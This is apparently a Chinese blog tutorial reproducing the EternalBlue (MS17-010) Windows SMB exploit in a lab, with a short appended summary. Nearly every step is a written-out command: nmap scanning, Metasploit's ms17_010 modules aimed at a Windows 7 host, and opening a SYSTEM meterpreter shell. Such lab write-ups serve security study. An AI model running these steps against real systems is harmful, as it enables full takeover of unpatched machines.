永恒之蓝漏洞复现

永恒之蓝漏洞复现

漏洞背景:
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
存在漏洞的主机只需要开放445端口即可被攻击,获取系统最高权限。

环境准备:

  • 攻击端 Linux kali:192.168.214.128
  • 被攻击端 win 7 x64:192.168.214.129(关闭防火墙)

一、扫描端口

使用 nmap 扫描目标端口;

nmap 192.168.214.129

查看结果:445端口为开放状态,操作系统为 win 7;
image.png

二、扫描漏洞

调用 msf 工具选择永恒之蓝扫描模块,进行漏洞扫描

  1. 调用 msf 工具;
msfconsole

image.png

  1. 选择漏洞扫描模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择扫描模块
use 3

image.png

  1. 查看运行永恒之蓝攻击的必需参数;
show options

image.png

  1. RHOSTS为目标主机,必需项;
set rhosts 192.168.214.129

image.png

  1. 运行扫描
run

image.png

显示目标主机很可能会受到永恒之蓝漏洞的攻击。

三、漏洞攻击

  1. 选择漏洞攻击模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择攻击模块
use 0

image.png

  1. 查看参数;
show options

image.png

  1. 设置RHOSTS;
set rhosts 192.168.214.129

image.png

  1. 运行攻击;
run

image.png

攻击成功后返回一个 meterpreter 会话,通过该会话可以控制目标主机system权限。

  1. 输入 shell 即可进入win7的cmd;
# 进入命令行
shell
# 切换字符集编码,解决乱码问题
chcp 65001

image.png

  1. 查看主机信息;

image.png

四、放入后台

  1. 将会话放入后台,方便后续调用;
# 退出cmd
exit
# 将当前会话放入 msf 后台
background

image.png

  1. 查看会话并调用
# 查看所有已连接的会话
sessions
# 调用指定会话
sessions -i 1

image.png

  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之漏洞流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,永恒之漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之漏洞](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值